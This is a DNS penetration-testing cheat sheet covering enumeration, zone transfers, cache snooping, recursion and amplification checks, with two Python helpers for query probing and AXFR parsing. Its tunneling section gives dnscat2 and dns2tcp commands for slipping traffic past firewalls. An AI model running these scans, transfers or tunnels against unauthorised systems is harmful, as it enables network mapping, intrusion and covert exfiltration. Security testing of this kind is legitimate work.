DNS penetration testing guide covering zone transfer testing, subdomain enumeration, DNS cache snooping, and DNS amplification attacks using tools like Dig, DNSRecon, Fierce, and Sublist3r for security assessments and ethical hacking.
DNS (Domain Name System) runs on port 53 and translates domain names to IP addresses. DNS servers often contain misconfigurations that can reveal internal network structure, hostnames, and sensitive information through zone transfers, subdomain enumeration, and information disclosure.
Nmap service scan:
nmap -sV -sU -p 53 $RHOST
nmap -sC -sV -sU -p 53 $RHOST
DNS version detection:
nmap --script dns-nsid -p 53 -sU $RHOST
nmap --script dns-service-discovery -p 53 -sU $RHOST
Default safe scripts:
nmap --script "dns-* and safe" -p 53 -sU $RHOST
All DNS scripts:
nmap --script dns-* -p 53 -sU $RHOST
Common enumeration scripts:
nmap --script dns-brute,dns-cache-snoop,dns-recursion -p 53 -sU $RHOST
Vulnerability detection:
nmap --script dns-zone-transfer -p 53 -sU $RHOST
Dig:
dig @$RHOST $DOMAIN A
dig @$RHOST $DOMAIN MX
dig @$RHOST $DOMAIN NS
dig @$RHOST $DOMAIN TXT
dig @$RHOST $DOMAIN SOA
dig @$RHOST $DOMAIN ANY
dig @$RHOST $DOMAIN ANY +noall +answer
Nslookup:
nslookup $DOMAIN $RHOST
nslookup -type=MX $DOMAIN $RHOST
nslookup -type=NS $DOMAIN $RHOST
Host:
host $DOMAIN $RHOST
host $DOMAIN $RHOST -t ANY
-t ANY asks for every record type at once (A, AAAA, MX, NS, TXT, SOA, SRV, CNAME); many servers now return a deliberately minimal reply to ANY (RFC 8482), so query the types individually as well.
Get nameservers:
dig @$RHOST $DOMAIN NS +short
Comprehensive DNS enumeration tool:
Basic enumeration:
dnsrecon -d $DOMAIN
dnsrecon -d $DOMAIN -t std -n $RHOST
-t std  standard scan type
-n  target the specified DNS server for the queries
Enumerate subdomains to discover additional attack surface and internal services.
DNSRecon:
dnsrecon -d $DOMAIN -D /usr/share/wordlists/dnsmap.txt -t brt
dnsrecon -d $DOMAIN -D /usr/share/wordlists/subdomains-top1million-5000.txt -t brt
Fierce:
fierce -dns $DOMAIN
fierce -dns $DOMAIN -wordlist /usr/share/wordlists/dnsmap.txt
Gobuster (DNS mode):
gobuster dns -d $DOMAIN -w /usr/share/wordlists/subdomains-top1million-5000.txt
Sublist3r:
sublist3r -d $DOMAIN
sublist3r -d $DOMAIN -n -t 100
Dnsenum:
dnsenum $DOMAIN
dnsenum --threads 50 -f /usr/share/wordlists/dnsmap.txt $DOMAIN
Query various DNS record types to gather information about the target infrastructure.
TXT Records:
dig @$RHOST $DOMAIN TXT
dig @$RHOST _dmarc.$DOMAIN TXT
dig @$RHOST _spf.$DOMAIN TXT
SPF Records:
dig @$RHOST $DOMAIN TXT | grep spf
Common record types:
dig @$RHOST $DOMAIN MX # Mail servers
dig @$RHOST $DOMAIN SRV # Service records
dig @$RHOST $DOMAIN CNAME # Canonical names
dig @$RHOST $DOMAIN AAAA # IPv6 addresses
Discover hostnames from IP ranges:
Single IP:
dig @$RHOST -x 192.168.1.1
host 192.168.1.1 $RHOST
IP range:
for ip in {1..254}; do dig @$RHOST -x 192.168.1.$ip +short; done
Query DNS cache to discover recently queried domains, which can reveal internal services and visited websites.
Manual cache query:
dig @$RHOST $CANDIDATE +norecurse
$CANDIDATE is a hostname that may have been resolved recently (a software-update or SaaS hostname, for example); a made-up name such as nonexistent12345.$DOMAIN can never be in the cache. If the response is NOERROR with an answer section and the aa flag clear, the name was served from cache (queried recently).
Automated cache snooping:
nmap --script dns-cache-snoop --script-args 'dns-cache-snoop.mode=nonrecursive,dns-cache-snoop.domains={<host1>,<host2>}' -p 53 -sU $RHOST
Replace <host1>,<host2> with the names to test; without dns-cache-snoop.domains the script uses its built-in list, and mode=timed uses TTL timing instead of non-recursive queries.
Test for common DNS misconfigurations and vulnerabilities before attempting exploitation.
Zone transfers allow DNS servers to replicate DNS data. Test if zone transfers are allowed without proper restrictions.
Manual test with dig:
dig @$RHOST $DOMAIN AXFR
dig @$RHOST -t AXFR $DOMAIN
Test with nslookup:
nslookup
> server $RHOST
> set type=any
> ls -d $DOMAIN
(the ls command exists only in the Windows nslookup; on Linux use dig or host)
Test with host:
host -T -l $DOMAIN $RHOST
Test against all nameservers:
for ns in $(dig +short NS $DOMAIN); do echo "=== $ns ==="; dig @$ns $DOMAIN AXFR; done
Automated testing:
dnsrecon -d $DOMAIN -a -n $RHOST
fierce -dns $DOMAIN -dnsserver $RHOST
nmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=$DOMAIN -p 53 -sU $RHOST
Note: Successful zone transfers reveal internal network structure, subdomains, and hostnames. Always test if zone transfers are allowed, even if they should be restricted.
Test if DNS server allows recursive queries (should be restricted for public DNS):
Test recursion:
dig @$RHOST www.google.com
If the server returns an answer for a domain it is not authoritative for (and sets the ra flag in the response), recursion is enabled.
Note: Internet-facing authoritative name servers should refuse recursion so they cannot be used as reflectors in DNS amplification attacks. Internal resolvers typically allow recursion.
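The cache snooping check above and the recursion check both come down to two header bits of a reply to an RD=0 query. This added example (not part of the original guide; the classification rule and the `snoop()` helper are my own) builds the non-recursive query by hand, decodes the header, and classifies the answer the way dig output is read above:

```python
import random
import socket
import struct

# DNS header flag bits (RFC 1035, section 4.1.1)
FLAG_AA = 0x0400   # authoritative answer
FLAG_RD = 0x0100   # recursion desired (the bit dig +norecurse clears)
FLAG_RA = 0x0080   # recursion available
RCODE_MASK = 0x000F

def build_query(name, qtype=1, recursion_desired=True, txid=None):
    """Build a minimal UDP DNS query for `name` (qtype 1 = A)."""
    txid = random.getrandbits(16) if txid is None else txid
    flags = FLAG_RD if recursion_desired else 0
    header = struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0)
    qname = b"".join(bytes([len(label)]) + label.encode()
                     for label in name.rstrip(".").split("."))
    return header + qname + b"\x00" + struct.pack("!HH", qtype, 1)

def parse_header(resp):
    """Decode the 12-byte response header into the fields the checks need."""
    txid, flags, _qd, ancount, _ns, _ar = struct.unpack("!HHHHHH", resp[:12])
    return {"id": txid, "aa": bool(flags & FLAG_AA), "ra": bool(flags & FLAG_RA),
            "rcode": flags & RCODE_MASK, "ancount": ancount}

def classify(hdr):
    """Interpret the reply to an RD=0 query for a name outside the server's own zones."""
    if hdr["rcode"] == 0 and hdr["ancount"] > 0 and not hdr["aa"]:
        return "cached"                 # answered without recursing: someone asked recently
    if hdr["ra"]:
        return "not cached, recursion available"
    return "not cached, recursion refused"

def snoop(server, name, timeout=3.0):
    """Send the non-recursive probe to `server` (IP string) and classify its answer."""
    query = build_query(name, recursion_desired=False)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(query, (server, 53))
        resp, _ = sock.recvfrom(4096)
    hdr = parse_header(resp)
    if hdr["id"] != struct.unpack("!H", query[:2])[0]:
        raise ValueError("transaction ID mismatch: reply does not belong to our query")
    return classify(hdr)

if __name__ == "__main__":
    # Constructed reply (not captured traffic): QR|RD|RA set, NOERROR, one answer -> "cached"
    print(classify(parse_header(struct.pack("!HHHHHH", 0x1234, 0x8180, 1, 1, 0, 0))))
```

`snoop("<resolver-ip>", "<candidate-name>")` runs the live check; the `ra` bit alone answers the recursion question, while `ancount` and `aa` together answer the caching one.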
Check if wildcard DNS is configured:
Test random subdomain:
dig @$RHOST random12345nonexistent.$DOMAIN
If a random, nonexistent name resolves (usually to the same IP as the apex or other hosts), wildcard DNS is enabled; brute-force results must then be filtered against that address to remove false positives.
Check whether the public zone leaks internal addresses (useful for mapping internal networks and a precondition for DNS rebinding scenarios):
Internal IP resolution:
dig @$RHOST internal.$DOMAIN
# Check whether the answer is a private (RFC 1918) address: 10.x.x.x, 192.168.x.x, 172.16-31.x.x
Test DNS cache poisoning resistance:
Check source port and transaction ID randomness (the resolver must allow recursion for this to work, because the test observes the queries it sends out):
# Each query makes the resolver contact DNS-OARC's test servers, which report how random the source ports and transaction IDs they saw were
dig @$RHOST porttest.dns-oarc.net TXT +short
dig @$RHOST txidtest.dns-oarc.net TXT +short
If zone transfers are allowed, exploit them to retrieve all DNS records for a domain.
Dig:
dig @$RHOST $DOMAIN AXFR
dig @$RHOST -t AXFR $DOMAIN
Nslookup:
nslookup
> server $RHOST
> set type=any
> ls -d $DOMAIN
Host:
host -T -l $DOMAIN $RHOST
DNSRecon:
dnsrecon -d $DOMAIN -a
dnsrecon -d $DOMAIN -a -n $RHOST
Fierce:
fierce -dns $DOMAIN -dnsserver $RHOST
Nmap:
nmap --script dns-zone-transfer -p 53 -sU $RHOST
nmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=$DOMAIN -p 53 -sU $RHOST
Attempt zone transfer against all nameservers:
for ns in $(dig +short NS $DOMAIN); do echo "=== $ns ==="; dig @$ns $DOMAIN AXFR; done
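A successful transfer is only useful once it is turned into an inventory: which record types exist, which hostnames were exposed, and which of them point into RFC 1918 space (the private-IP check from the misconfiguration section). This added example (not part of the original guide; the sample zone data is constructed) parses `dig AXFR` output and produces that summary:

```python
import ipaddress
from collections import Counter

# RFC 1918 ranges, the same ones the private-IP check refers to
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample of what `dig @$RHOST $DOMAIN AXFR` prints (not data from a real zone)
SAMPLE_AXFR = """\
; <<>> DiG 9.18.24 <<>> @ns1.example.internal example.internal AXFR
example.internal.\t3600\tIN\tSOA\tns1.example.internal. admin.example.internal. 2024010101 7200 3600 1209600 3600
example.internal.\t3600\tIN\tNS\tns1.example.internal.
ns1.example.internal.\t3600\tIN\tA\t192.168.10.5
www.example.internal.\t3600\tIN\tA\t203.0.113.10
vpn.example.internal.\t3600\tIN\tA\t10.0.0.20
example.internal.\t3600\tIN\tMX\t10 smtp.example.internal.
smtp.example.internal.\t3600\tIN\tA\t10.0.0.25
example.internal.\t3600\tIN\tSOA\tns1.example.internal. admin.example.internal. 2024010101 7200 3600 1209600 3600
;; Query time: 4 msec
"""

def parse_axfr(text):
    """Return (owner, type, rdata) tuples from dig AXFR output, skipping ';' comment lines."""
    records = []
    for line in text.splitlines():
        if not line or line.startswith(";"):
            continue
        parts = line.split(None, 4)          # owner TTL class type rdata
        if len(parts) < 5 or parts[2] != "IN":
            continue
        records.append((parts[0].rstrip("."), parts[3], parts[4]))
    return records

def is_rfc1918(addr):
    """True if `addr` is an IPv4 address inside one of the RFC 1918 ranges."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:                       # hostnames, MX priorities, SOA fields
        return False
    return any(ip in net for net in RFC1918)

def summarize(records):
    """Count record types and list hosts whose A records point into RFC 1918 space."""
    by_type = Counter(rtype for _, rtype, _ in records)
    internal = sorted({o for o, t, r in records if t == "A" and is_rfc1918(r)})
    hosts = sorted({o for o, t, _ in records if t in ("A", "AAAA", "CNAME")})
    return {"types": dict(by_type), "internal_hosts": internal, "hosts": hosts}

if __name__ == "__main__":
    print(summarize(parse_axfr(SAMPLE_AXFR)))   # the SOA appears twice: AXFR starts and ends with it
```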
Test if the DNS server can be used for amplification attacks (open recursion combined with large responses to ANY queries gives a high amplification factor).
Test recursion:
dig @$RHOST www.google.com
If server resolves external domains, recursion is enabled.
Test ANY queries:
dig @$RHOST $DOMAIN ANY
DNS tunneling can bypass network restrictions by encapsulating data in DNS queries and responses.
Identify suspicious DNS traffic:
# High query frequency
tcpdump -i eth0 port 53
# Large DNS responses
# Unusual subdomains
# Queries to known DNS tunnel providers
dns2tcp:
# Client (the client binary is dns2tcpc; -z is the tunnel domain, -r the remote resource, -l the local port, -d the debug level)
dns2tcpc -l 8888 -r ssh -z $DOMAIN -d 2
# Server
dns2tcpd -f dns2tcpd.conf
dnscat2:
# Server (authoritative for $DOMAIN)
ruby dnscat2.rb $DOMAIN
# Client
dnscat --dns domain=$DOMAIN
Note: DNS tunneling is often used by malware and can be detected through traffic analysis. It's slow but can bypass traditional firewall rules.
Check for DoH:
curl -H "accept: application/dns-json" "https://$RHOST/dns-query?name=$DOMAIN&type=A"
Check for DoT:
nmap -sV -p 853 $RHOST
openssl s_client -connect $RHOST:853
DoH query:
curl "https://cloudflare-dns.com/dns-query?name=$DOMAIN&type=A" -H "accept: application/dns-json"
DoT query:
dig @$RHOST -p 853 +tls $DOMAIN
Most common DNS query tool:
Common options:
dig @$RHOST $DOMAIN +short # Short output
dig @$RHOST $DOMAIN +noall +answer # Clean output
dig @$RHOST $DOMAIN +trace # Trace DNS resolution
dig @$RHOST $DOMAIN +multiline # Readable format
Comprehensive DNS enumeration:
All features:
dnsrecon -d $DOMAIN -a -s -b -y -k -w -z --threads 50
-a  zone transfer (AXFR)
-s  reverse lookup of the IPv4 ranges in the SPF record
-b  Bing search enumeration
-y  Yandex search enumeration
-k  crt.sh certificate transparency enumeration
-w  deep whois lookup
-z  DNSSEC zone walk (NSEC)
DNS enumeration and brute forcing:
Full scan:
dnsenum $DOMAIN
dnsenum --threads 50 -f wordlist.txt $DOMAIN
DNS reconnaissance tool:
Basic:
fierce -dns $DOMAIN
fierce -dns $DOMAIN -wordlist wordlist.txt -threads 10
Subdomain enumeration using multiple sources:
sublist3r -d $DOMAIN
sublist3r -d $DOMAIN -b -t 100 -e google,yahoo,bing,baidu,ask
-b  enables brute-force mode
-t  sets the number of threads for concurrent operations
-e  which search engines to query for subdomain discovery
High-performance DNS stub resolver:
# Resolve every candidate name against a list of trusted resolvers (-t A record type, -o S simple output, -w write results)
cat subdomains.txt | massdns -r /usr/share/massdns/lists/resolvers.txt -t A -o S -w results.txt